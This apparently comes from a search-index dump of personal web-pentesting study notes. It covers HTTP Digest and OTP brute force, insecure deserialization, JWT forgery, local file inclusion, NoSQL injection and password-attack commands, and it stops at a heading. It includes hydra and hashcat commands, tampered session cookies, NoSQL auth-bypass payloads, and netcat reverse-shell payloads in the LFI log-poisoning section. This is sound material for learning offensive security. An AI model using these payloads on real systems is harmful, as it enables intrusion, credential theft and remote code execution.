                                            HTTP Digest Authentication is an authentication mechanism used in web applications and services to securely verify the identity of users or clients trying to access protected resources. It addresses some of the security limitations of Basic Authentication by employing a challenge-response mechanism and hashing to protect user credentials during transmission. However, like Basic Authentication, it's important to use HTTPS to ensure the security of the communication.

                                            • Client Request: When a client (usually a web browser) makes a request to a protected resource on a server, the server responds with a 401 Unauthorized status code if authentication is required.
                                            • Challenge Header: In the response, the server includes a WWW-Authenticate header with the value \"Digest.\" This header provides information needed by the client to construct a secure authentication request. Example of a WWW-Authenticate header:
                                            WWW-Authenticate: Digest realm=\"Example\", qop=\"auth\", nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"\n\n# Where:\n# - **realm**: A descriptive string indicating the protection space (usually the name of the application or service).\n# - **qop (Quality of Protection)**: Specifies the quality of protection. Commonly set to \"auth.\"\n# - **nonce**: A unique string generated by the server for each request to prevent replay attacks.\n# - **opaque**: An opaque value set by the server, which the client must return unchanged in the response.\n
                                            • Client Response: The client constructs a response using the following components: Username, Realm, Password, Nonce, Request URI (the path to the protected resource), HTTP method (e.g., GET, POST), cnonce (a client-generated nonce), qop (the quality of protection), H(A1) and H(A2), which are hashed values derived from the components. It then calculates a response hash (response) based on these components and includes it in an Authorization header. Example Authorization header:
                                            Authorization: Digest username=\"user\", realm=\"Example\", nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", uri=\"/resource\", qop=auth, nc=00000001, cnonce=\"0a4f113b\", response=\"6629fae49393a05397450978507c4ef1\", opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"\n
                                            • Server Validation: The server receives the request with the Authorization header and validates the response hash calculated by the client. It does this by reconstructing the same components and calculating its own response hash. If the hashes match, the server considers the client authenticated and grants access to the requested resource.
                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#how-to-attack-it_1","title":"How to attack it","text":"

                                            We can use hydra.

                                            hydra -l admin -P /root/Desktop/wordlists/100-common-passwords.txt http-get://192.155.195.3/digest/\n\nhydra 192.155.195.3 -l admin -P /root/Desktop/wordlists/100-common-passwords.txt http-get /digest/\n
                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#multifactor-authentication","title":"Multifactor Authentication","text":"","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#otp","title":"OTP","text":"

                                            OTP (One-Time Password) security is a two-factor authentication (2FA) method used to enhance the security of user accounts and systems. OTPs are temporary, single-use codes that are typically generated and sent to the user's registered device (such as a mobile phone) to verify their identity during login or transaction processes. The primary advantage of OTPs is that they are time-sensitive and expire quickly, making them difficult for attackers to reuse.

                                            For bruteforcing OTPs OWASZAP is more recommended since it does not introduce delays or throttling.

                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#types-of-otps","title":"Types of OTPs","text":"
                                            • Time-Based OTPs (TOTP): TOTP is a widely used OTP method that generates codes based on a shared secret key and the current time. These codes are typically valid for a short duration, often 30 seconds.
                                            • SMS-Based OTPs: OTPs can be sent to users via SMS messages. When users log in, they receive an OTP on their mobile phone, which they must enter to verify their identity.
                                            • Rate Limiting and Lockout: Implement rate limiting and account lockout mechanisms to prevent brute force attacks on OTPs. Lockout accounts after a certain number of failed OTP attempts. OTP rate limiting is a security mechanism used to prevent brute force attacks or abuse of one-time password (OTP) systems, such as those used in two-factor authentication (2FA). Rate limiting restricts the number of OTP verification attempts that can be made within a specified time period. By enforcing rate limits, organizations can reduce the risk of attackers guessing or trying out multiple OTPs in quick succession.
                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/insecure-deserialization/","title":"Insecure deserialization","text":"

                                            Insecure deserialization is when user-controllable data is deserialized by a website. This potentially enables an attacker to manipulate serialized objects in order to pass harmful data into the application code.

                                            Sources for these notes
                                            • Portswigger: Insecure deserialization.
                                            • Hacktricks: Deserialization.
                                            • OWASP deserialization Cheat sheet.
                                            Tools
                                            • Java: ysoserial
                                            • PHP: phpggc.
                                            • Burpsuite Extensions: Java Deserialization Scanner, PHP Object Injection Slinger, PHP Object Injection Check
                                            • Exploits: Ruby 2.X generic deserialization to RCE gadget chain
                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#what-is-deserialization","title":"What is deserialization","text":"
                                            • Serialization\u00a0is the process of converting complex data structures, such as objects and their fields, into a \"flatter\" format that can be sent and received as a sequential stream of bytes.

                                            • Deserialization\u00a0is the process of restoring this byte stream to a fully functional replica of the original object, in the exact state as when it was serialized.

                                            Exactly how objects are serialized depends on the language. Some languages serialize objects into binary formats, whereas others use different string formats, with varying degrees of human readability. \u00a0

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#identifying","title":"Identifying","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#php","title":"PHP","text":"

                                            PHP uses a mostly human-readable string format, with letters representing the data type and numbers representing the length of each entry.

                                            For example, consider a\u00a0User\u00a0object with the attributes:

                                            $user->name = \"carlos\"; $user->isLoggedIn = true;

                                            When serialized, this object may look something like this:

                                            O:4:\"User\":2:{s:4:\"name\":s:6:\"carlos\"; s:10:\"isLoggedIn\":b:1;}

                                            - `O:4:\"User\"`\u00a0- An object with the 4-character class name\u00a0`\"User\"`\n- `2`\u00a0- the object has 2 attributes\n- `s:4:\"name\"`\u00a0- The key of the first attribute is the 4-character string\u00a0`\"name\"`\n- `s:6:\"carlos\"`\u00a0- The value of the first attribute is the 6-character string\u00a0`\"carlos\"`\n- `s:10:\"isLoggedIn\"`\u00a0- The key of the second attribute is the 10-character string\u00a0`\"isLoggedIn\"`\n- `b:1`\u00a0- The value of the second attribute is the boolean value\u00a0`true`\n

                                            The native methods for PHP serialization are\u00a0serialize()\u00a0and\u00a0unserialize(). If you have source code access, you should start by looking for\u00a0unserialize()\u00a0anywhere in the code and investigating further.

                                            In PHP, specific magic methods are utilized during the serialization and deserialization processes:

                                            • __sleep: Invoked when an object is being serialized. This method should return an array of the names of all properties of the object that should be serialized. It's commonly used to commit pending data or perform similar cleanup tasks.

                                            • __wakeup: Called when an object is being deserialized. It's used to reestablish any database connections that may have been lost during serialization and perform other reinitialization tasks.

                                            • __unserialize: This method is called instead of __wakeup (if it exists) when an object is being deserialized. It gives more control over the deserialization process compared to __wakeup.

                                            • __destruct: This method is called when an object is about to be destroyed or when the script ends. It's typically used for cleanup tasks, like closing file handles or database connections.

                                            • __toString: This method allows an object to be treated as a string. It can be used for reading a file or other tasks based on the function calls within it, effectively providing a textual representation of the object.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#java","title":"Java","text":"

                                            Some languages, such as Java, use binary serialization formats.

                                            To distinguish it: serialized Java objects always begin with the same bytes, which are encoded as\u00a0ac ed\u00a0in hexadecimal and\u00a0rO0\u00a0in Base64.

                                            Any class that implements the interface\u00a0java.io.Serializable\u00a0can be serialized and deserialized.

                                            If you have source code access, take note of any code that uses the\u00a0readObject()\u00a0method, which is used to read and deserialize data from an\u00a0InputStream.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#attacks","title":"Attacks","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#1-manipulate-serialized-objects","title":"1. Manipulate serialized objects","text":"

                                            If you have source code access, take note of any code that uses the\u00a0readObject()\u00a0method, which is used to read and deserialize data from an\u00a0InputStream.

                                            As a simple example, consider a website that uses a serialized\u00a0User\u00a0object to store data about a user's session in a cookie. If an attacker spotted this serialized object in an HTTP request, they might decode it to find the following byte stream:

                                            O:4:\"User\":2:{s:8:\"username\";s:6:\"carlos\";s:7:\"isAdmin\";b:0;}

                                            The\u00a0isAdmin\u00a0attribute is an obvious point of interest. An attacker could simply change the boolean value of the attribute to\u00a01\u00a0(true), re-encode the object, and overwrite their current cookie with this modified value. In isolation, this has no effect. However, let's say the website uses this cookie to check whether the current user has access to certain administrative functionality:

                                            $user = unserialize($_COOKIE); \nif ($user->isAdmin === true)\n{ // allow access to admin interface }\n

                                            This vulnerable code would instantiate a\u00a0User\u00a0object based on the data from the cookie, including the attacker-modified\u00a0isAdmin\u00a0attribute. At no point is the authenticity of the serialized object checked. This data is then passed into the conditional statement and, in this case, would allow for an easy privilege escalation.

                                            Burpsuite lab

                                            Burpsuite Lab: Modifying serialized objects

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#2-modify-data-types","title":"2. Modify data types","text":"

                                            PHP-based logic is particularly vulnerable to this kind of manipulation due to the behavior of its loose comparison operator (==) when comparing different data types.

                                            Reference: PHP type juggling

                                            Additionally, if we spot a session cookie base64-encoded with an object, such as this PHP one, we can try to modify it.

                                            Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJieno5ZmJ2OHV6YXM3MTRlcnJuaGExcTVwcGJ6eWY1aCI7fQ%3d%3d\n

                                            Decoded from base64

                                            O:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:12:\"access_token\";s:32:\"bzz9fbv8uzas714errnha1q5ppbzyf5h\";}\n

                                            s refers to string, and i to integer. We could modify the input and the data type modifying the object to:

                                            O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0:\"\";}\n

                                            Afterwards, base64 encode the object to insert it as the cookie session:

                                            Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDoiIjt9\n

                                            Explanation: Let's say an attacker modified the password attribute so that it contained the integer\u00a00\u00a0instead of the expected string. As long as the stored password does not start with a number, the condition would always return\u00a0true, enabling an authentication bypass. Note that this is only possible because deserialization preserves the data type. If the code fetched the password from the request directly, the\u00a00\u00a0would be converted to a string and the condition would evaluate to\u00a0false.

                                            Burpsuite lab

                                            Burpsuite Lab: Modifying serialized data types

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#3-abuse-application-functionality","title":"3. Abuse application functionality","text":"

                                            A website's functionality might also perform dangerous operations on data from a deserialized object. In this case, you can use insecure deserialization to pass in unexpected data and leverage the related functionality to do damage.

                                            For example, as part of a website's \"Delete user\" functionality, the user's profile picture is deleted by accessing the file path in the\u00a0$user->image_location\u00a0attribute. If this\u00a0$user\u00a0was created from a serialized object, an attacker could exploit this by passing in a modified object with the\u00a0image_location\u00a0set to an arbitrary file path.

                                            Burpsuite lab

                                            Burpsuite Lab: Using application functionality to exploit insecure deserialization

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#4-magic-methods","title":"4. Magic methods","text":"

                                            Magic methods are a special subset of methods that are invoked automatically whenever a particular event or scenario occurs. \u00a0One of the most common examples in PHP is\u00a0__construct(), which is invoked whenever an object of the class is instantiated, similar to Python's\u00a0__init__. Typically, constructor magic methods like this contain code to initialize the attributes of the instance. However, magic methods can be customized by developers to execute any code they want.

                                            PHP -> Most importantly in this context, some languages have magic methods that are invoked automatically\u00a0during\u00a0the deserialization process. For example, PHP's\u00a0unserialize()\u00a0method looks for and invokes an object's\u00a0__wakeup()\u00a0magic method.

                                            JAVA -> In Java deserialization, the same applies to the\u00a0ObjectInputStream.readObject()\u00a0method, which is used to read data from the initial byte stream and essentially acts like a constructor for \"re-initializing\" a serialized object. However,\u00a0Serializable\u00a0classes can also declare their own\u00a0readObject()\u00a0method as follows:

                                            private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException \n{ \n    // implementation \n}\n

                                            A\u00a0readObject()\u00a0method declared in exactly this way acts as a magic method that is invoked during deserialization. This allows the class to control the deserialization of its own fields more closely.

                                            You should pay close attention to any classes that contain these types of magic methods. They allow you to pass data from a serialized object into the website's code before the object is fully deserialized. This is the starting point for creating more advanced exploits.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#5-inject-arbitrary-objects","title":"5. Inject arbitrary objects","text":"

                                            The methods available to an object are determined by its class. Deserialization methods do not typically check what they are deserializing. This means that you can pass in objects of any serializable class that is available to the website, and the object will be deserialized.

                                            The fact that this object is not of the expected class does not matter. The unexpected object type might cause an exception in the application logic, but the malicious object will already be instantiated by then.

                                            Burpsuite lab

                                            Burpsuite Lab: Arbitrary object injection in PHP

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#6-gadget-chains","title":"6. Gadget chains","text":"

                                            Classes containing these deserialization magic methods can also be used to initiate more complex attacks involving a long series of method invocations, known as a \"gadget chain\".

                                            A \"gadget\" is a snippet of code that exists in the application that can help an attacker to achieve a particular goal. An individual gadget may not directly do anything harmful with user input. However, the attacker's goal might simply be to invoke a method that will pass their input into another gadget. By chaining multiple gadgets together in this way, an attacker can potentially pass their input into a dangerous \"sink gadget\", where it can cause maximum damage.

                                            It is important to note that the vulnerability is the deserialization of user-controllable data, not the mere presence of a gadget chain in the website's code or any of its libraries.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#prebuilt-gadget-chains","title":"Prebuilt gadget chains","text":"

                                            Java: ysoserial

                                            PHP: phpggc

                                            About ysoserial: Not all of the gadget chains in ysoserial enable you to run arbitrary code. Instead, they may be useful for other purposes. For example, you can use the following ones to help you quickly detect insecure deserialization on virtually any server: - The\u00a0URLDNS\u00a0chain triggers a DNS lookup for a supplied URL. Most importantly, it does not rely on the target application using a specific vulnerable library and works in any known Java version. This makes it the most universal gadget chain for detection purposes. If you spot a serialized object in the traffic, you can try using this gadget chain to generate an object that triggers a DNS interaction with the Burp Collaborator server. If it does, you can be sure that deserialization occurred on your target. - JRMPClient\u00a0is another universal chain that you can use for initial detection. It causes the server to try establishing a TCP connection to the supplied IP address. Note that you need to provide a raw IP address rather than a hostname. This chain may be useful in environments where all outbound traffic is firewalled, including DNS lookups. You can try generating payloads with two different IP addresses: a local one and a firewalled, external one. If the application responds immediately for a payload with a local address, but hangs for a payload with an external address, causing a delay in the response, this indicates that the gadget chain worked because the server tried to connect to the firewalled address. In this case, the subtle time difference in responses can help you to detect whether deserialization occurs on the server, even in blind cases.

                                            Burpsuite lab

                                            Burpsuite Lab: Exploiting Java deserialization with Apache Commons

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#documented-gadget-chains","title":"Documented gadget chains","text":"

                                            There may not always be a dedicated tool available for exploiting known gadget chains in the framework used by the target application. In this case, it's always worth looking online to see if there are any documented exploits that you can adapt manually.

                                            Burpsuite lab

                                            Burpsuite Lab: Exploiting Ruby deserialization using a documented gadget chain

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#7-your-own-exploit","title":"7. Your own exploit","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#8-phar-deserialization","title":"8. PHAR deserialization","text":"

                                            PHP provides several URL-style wrappers that you can use for handling different protocols when accessing file paths. One of these is the\u00a0phar://\u00a0wrapper, which provides a stream interface for accessing PHP Archive (.phar) files.

                                            The PHP documentation reveals that\u00a0PHAR\u00a0manifest files contain serialized metadata. Crucially, if you perform any filesystem operations on a\u00a0phar://\u00a0stream, this metadata is implicitly deserialized.

                                            This means that a\u00a0phar://\u00a0stream can potentially be a vector for exploiting insecure deserialization.

                                            The explanation: This technique requires you to upload the\u00a0PHAR\u00a0to the server somehow. One approach is to use an image upload functionality, for example. If you are able to create a polyglot file, with a\u00a0PHAR\u00a0masquerading as a simple\u00a0JPG, you can sometimes bypass the website's validation checks. If you can then force the website to load this polyglot \"JPG\" from a\u00a0phar://\u00a0stream, any harmful data you inject via the\u00a0PHAR\u00a0metadata will be deserialized. As the file extension is not checked when PHP reads a stream, it does not matter that the file uses an image extension. As long as the class of the object is supported by the website, both the\u00a0__wakeup()\u00a0and\u00a0__destruct()\u00a0magic methods can be invoked in this way, allowing you to potentially kick off a gadget chain using this technique.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#9-memory-corruption","title":"9. Memory corruption","text":"

                                            Even without the use of gadget chains, it is still possible to exploit insecure deserialization. If all else fails, there are often publicly documented memory corruption vulnerabilities that can be exploited via insecure deserialization. TDeserialization methods, such as PHP's\u00a0unserialize()\u00a0are rarely hardened against these kinds of attacks, and expose a huge amount of attack surface.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/jwt-attacks/","title":"Json Web Token attacks","text":"Resources

                                            https://github.com/Crypto-Cat/CTF/tree/main/web/WebSecurityAcademy/jwt

                                            JSON web tokens (JWTs) are a standardized format for sending cryptographically signed JSON data between systems.

                                            The server that issues the token typically generates the signature by hashing the header and payload. In some cases, they also encrypt the resulting hash.

                                            • As the signature is directly derived from the rest of the token, changing a single byte of the header or payload results in a mismatched signature.

                                            • Without knowing the server's secret signing key, it shouldn't be possible to generate the correct signature for a given header or payload.

                                            JSON Web Signature (JWS) -

                                            JSON Web Encryption (JWE) - The contents of the token are encrypted.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#jwt-signature-verification-attack","title":"JWT signature verification attack","text":"","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#1-server-not-verifying-the-signature","title":"1. Server not verifying the signature","text":"

                                            If the server doesn't verify the signature properly, there's nothing to stop an attacker from making arbitrary changes to the rest of the token.

                                            For example, consider a JWT containing the following claims:

                                            { \"username\": \"carlos\", \"isAdmin\": false }

                                            If the server identifies the session based on this\u00a0username, modifying its value might enable an attacker to impersonate other logged-in users. Similarly, if the\u00a0isAdmin\u00a0value is used for access control, this could provide a simple vector for privilege escalation.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#2-accepting-arbitrary-signatures","title":"2. Accepting arbitrary signatures","text":"

                                            JWT libraries typically provide one method for verifying tokens and another that just decodes them. For example, the Node.js library\u00a0jsonwebtoken\u00a0has\u00a0verify()\u00a0and\u00a0decode().

                                            Occasionally, developers confuse these two methods and only pass incoming tokens to the\u00a0decode()\u00a0method. This effectively means that the application doesn't verify the signature at all.

                                            Payload can be changed with no limitation.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#3-accepting-tokens-with-no-signature","title":"3. Accepting tokens with no signature","text":"

                                            Otherwise called the \"none\" attack. JWTs can be signed using a range of different algorithms, but can also be left unsigned. In this case, the\u00a0alg\u00a0parameter is set to\u00a0none, which indicates a so-called \"unsecured JWT\".

                                            \"alg\" parameter can therefore be set to:

                                            none\nNone\nNONE\nNoNE\n

                                            Then, the attacker can be modify the payload.

                                            Finally, the payload part must still be terminated with a trailing dot.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#4-brute-forcing-secret-keys","title":"4. Brute-forcing secret keys","text":"

                                            When implementing JWT applications, developers sometimes make mistakes like forgetting to change default or placeholder secrets.

                                            jwt secrets payloads

                                            https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

                                            hashcat -a 0 -m 16500 <jwt> <wordlist>\n

                                            If you run the command more than once, you need to include the\u00a0--show\u00a0flag to output the results.

                                            Once you have identified the secret key, you can use it to generate a valid signature. Use JWT Editor for that (tab Keys.)

                                            Then, send you request to Repeater. In Repeater go to JSON Web Token tab, modify the payload and click on Sign. Select your signature.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#5-jwt-header-parameter-injections","title":"5. JWT header parameter injections","text":"

                                            According to the JWS specification, only the\u00a0alg\u00a0header parameter is mandatory. In practice, however, JWT headers (also known as JOSE headers) often contain several other parameters. The following ones are of particular interest to attackers.

                                            • jwk\u00a0(JSON Web Key) - Provides an embedded JSON object representing the key.

                                            • jku\u00a0(JSON Web Key Set URL) - Provides a URL from which servers can fetch a set of keys containing the correct key.

                                            • kid\u00a0(Key ID) - Provides an ID that servers can use to identify the correct key in cases where there are multiple keys to choose from. Depending on the format of the key, this may have a matching\u00a0kid\u00a0parameter.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#51-injecting-self-signed-jwts-via-the-jwk-parameter","title":"5.1. Injecting self-signed JWTs via the jwk parameter","text":"

                                            The JSON Web Signature (JWS) specification describes an optional\u00a0jwk\u00a0header parameter, which servers can use to embed their public key directly within the token itself in JWK format.

                                            How to perform the attack with Burpsuite:

                                            1. With the extension loaded, in Burp's main tab bar, go to the JWT Editor Keys tab.\n\n2. Generate a new RSA key.\n\n3. Send a request containing a JWT to Burp Repeater.\n\n4. In the message editor, switch to the extension-generated JSON Web Token tab and modify the token's payload however you like.\n\n5. Click Attack, then select Embedded JWK. When prompted, select your newly generated RSA key.\n\n6. Send the request to test how the server responds.\n
                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#52-injecting-self-signed-jwts-via-the-jku-parameter","title":"5.2. Injecting self-signed JWTs via the jku parameter","text":"

                                            Instead of embedding public keys directly using the\u00a0jwk\u00a0header parameter, some servers let you use the\u00a0jku\u00a0(JWK Set URL) header parameter to reference a JWK Set containing the key. When verifying the signature, the server fetches the relevant key from this URL.

                                            A JWK Set is a JSON object containing an array of JWKs representing different keys. You can see an example of this below.

                                            { \"keys\": [ { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"75d0ef47-af89-47a9-9061-7c02a610d5ab\", \"n\": \"o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ\" }, { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA\", \"n\": \"fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw\" } ] }`\n

                                            JWK Sets like this are sometimes exposed publicly via a standard endpoint, such as\u00a0/.well-known/jwks.json.

                                            So a way to trick this validation is by creating our own set of RSA keys.

                                            Then, have a server serving these keys.

                                            Then, modify the payload of the JWT.

                                            And finally, modify the head, by adding the kdi corresponding to our crafted RSA key, and a jkuparameter pointing to our server serving the keys. With this configuration we can use 'JWT Editor' in BurpSuite to sign the new crafted JWT.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#53-injecting-self-signed-jwts-via-the-kid-parameter","title":"5.3. Injecting self-signed JWTs via the kid parameter","text":"","tags":["web","pentesting","jwt"]},{"location":"webexploitation/local-file-inclusion-lfi/","title":"LFI attack - Local File Inclusion","text":"OWASP

                                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                                            ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion)

                                            Local File Inclusion (LFI) is a type of security vulnerability that occurs when an application allows an attacker to include files on the server through the web browser. File inclusion in web applications refers to the practice of including external files, often scripts or templates, into a web page dynamically. It is a fundamental concept used to create dynamic and modular web applications.

                                            LFI vulnerabilities typically occur due to poor input validation or lack of proper security mechanisms in web applications. Attackers exploit these vulnerabilities by manipulating input parameters that are used to specify file paths or filenames within the application:

                                            • File Inclusion Functions: Functions like include(), require(), or file_get_contents() that accept user-controlled input for file paths.
                                            • HTTP Parameters: Input fields in web forms or query parameters in URLs.
                                            • Cookies: If an application uses cookies to determine the file to include.
                                            • Session Variables: If session data can be manipulated to control file inclusion.

                                            Impact:

                                            • Information Disclosure: Attackers can read sensitive files, including configuration files, user data, and source code, exposing critical information.
                                            • Remote Code Execution: In some cases, LFI can lead to the execution of arbitrary code if an attacker can include malicious PHP or other script files.
                                            • Directory Traversal: LFI attacks can allow an attacker to navigate the directory structure, potentially leading to further vulnerabilities or unauthorized access.

                                            LFI (Local File Inclusion): The primary objective of an LFI attack is to include and display the contents of a file on the server within the context of a web application (to get it executed).

                                            Directory Traversal: Directory Traversal, also known as Path Traversal, focuses on navigating the file system's directory structure to access files or directories outside the intended path. While this can lead to LFI, the primary goal is often broader, encompassing the ability to read, modify, or delete files and directories.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#interesting-files","title":"Interesting files","text":"

                                            Interesting Windows files Interesting Linux files

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#procselfenviron","title":"/proc/self/environ","text":"

                                            This files contain Environment variables. One of those variables might be HTTP_USER_AGENT, which is the user agent used by the client to access the server. So by using a proxy interceptor we could modify that header to be, let's say:

                                            <?phpinfo()>\n

                                            When it comes to get a shell here, we need to use PHP function passthru, which is similar to the exec command:

                                            passthru\u00a0\u2014\u00a0Execute an external program and display raw output

                                            In this case, we would be adding in the user agent header the reverse shell:

                                            <?passthru(\"nc -e /bin/sh <attacker IP> <attacker port>\") ?> \n
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#varlogauthlog-or-varlogapache2accesslog","title":"/var/log/auth.log or /var/log/apache2/access.log","text":"

                                            If we have the ability to read a log file, then we can see if we can write in them in a malicious way.

                                            For instance, with /var/log/auth.log, we can try an ssh connection and see how these attemps are recorded on the file. Then, instead of using a real username, I can set some php code:

                                            ssh \"<?passthru('nc -e /bin/sh <attacker IP> <attacker port>');?>\"@$ip \n

                                            But there might be problems with blank spaces, slashes and so on, so one thing you can do is base64 encoded your netcat command, and tell the function to decode it before executing it

                                            # base64 encode your netcat command: nc -e /bin/sh <attacker IP> <attacker port>\nssh \"<?passthru(base64_decode'<base64 encoded text>');?>\"@$ip \n

                                            Now just get a netcat listener in your kali attacker machine.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#tools-and-payloads","title":"Tools and payloads","text":"
                                            • See updated chart: Attacks and tools for web pentesting.
                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/nosql-injection/","title":"NoSQL injection","text":"

                                            Dictionary for NoSQL injections.

                                            Examples of NoSQL databases: redis, mongo.

                                            SQL stands for Structure Query Language. NoSQL Injection is a security vulnerability that occurs in applications that utilize NoSQL databases. It is a type of attack that involves an attacker manipulating a NoSQL database query by injecting malicious input, leading to unauthorized access, data leakage, or unintended operations. In traditional SQL Injection attacks, attackers exploit vulnerabilities by inserting malicious SQL code into input fields that are concatenated with database queries. Similarly, in NoSQL Injection, attackers exploit weaknesses in the application's handling of user-supplied input to manipulate NoSQL database queries.

                                            How does it work a NoSQL injection? Explanation:

                                            # MongoDB query\nvar query = {\nusername: username,\npassword: password\n};\n\n# Perform query to check if credentials are valid\nvar result = db.users.findOne(query);\n\nif (result) {\n// Login successful\n} else {\n// Login failed\n

                                            In this example, the application constructs a MongoDB query using user-supplied values for the username and password fields. If an attacker intentionally provides a specially crafted value, they could potentially exploit a NoSQL injection vulnerability. For instance, an attacker might enter the following value as the username parameter:

                                            $gt:\"\"\n

                                            The attacker could potentially bypass the login mechanism and gain unauthorized access.

                                            Typical payloads:

                                            # Payload\nusername[$ne]=1$password[$ne]=1\n# Use case/Function: Not equals to (Auth Bypass)                |\n\n# Payload\nusername[$regex]=^adm$password[$ne]=1\n# Use case/Function: Checks a regular expression (Auth Bypass)\n\n# Payload\nusername[$regex]=.{25}&pass[$ne]=1\n# Use case/Function: Checks regex to find the length of a value\n\n# Payload\nusername[$eq]=admin&password[$ne]=1 \n# Use case/Function: Equals to.\n\n# Payload\nusername[$ne]=admin&pass[$gt]=s \n# Use case/Function: Greater than.\n

                                            Example of a user search form:

                                            With the not equal operator, it will return all users except for \"admin\".

                                            ","tags":["pentesting","web","pentesting"]},{"location":"webexploitation/password-attacks/","title":"Password attacks","text":"","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#connecting-to-target","title":"Connecting to Target","text":"
                                            # CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol\nxfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt!\n
                                            # Uses Evil-WinRM to establish a Powershell session with a target. \nevil-winrm -i <ip> -u user -p password\n
                                            # Uses SSH to connect to a target using a specified user.\nssh user@<ip>\n
                                            # Uses smbclient to connect to an SMB share using a specified user.\nsmbclient -U user \\\\\\\\<ip>\\\\SHARENAME\n
                                            # Uses smbserver.py to create a share on a linux-based attack host. Can be useful when needing to transfer files from a target to an attack host.\npython3 smbserver.py -smb2support CompData /home/<nameofuser>/Documents/\n
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#password-mutations","title":"Password mutations","text":"
                                            # Uses cewl to generate a wordlist based on keywords present on a website.\ncewl https://www.inlanefreight.com -d 4 -m 6 --lowercase -w inlane.wordlist\n
                                            # Uses Hashcat to generate a rule-based word list.\nhashcat --force password.list -r custom.rule --stdout > mut_password.list\n
                                            # Users username-anarchy tool in conjunction with a pre-made list of first and last names to generate a list of potential username. \n./username-anarchy -i /path/to/listoffirstandlastnames.txt\n
                                            # Uses Linux-based commands curl, awk, grep and tee to download a list of file extensions to be used in searching for files that could contain passwords. \ncurl -s https://fileinfo.com/filetypes/compressed \\| html2text \\| awk '{print tolower($1)}' \\| grep \"\\.\" \\| tee -a compressed_ext.txt\n
                                            ","tags":["OSCP"]},{"location":"webexploitation/password-attacks/#remote-password-attacks","title":"Remote Password Attacks","text":"
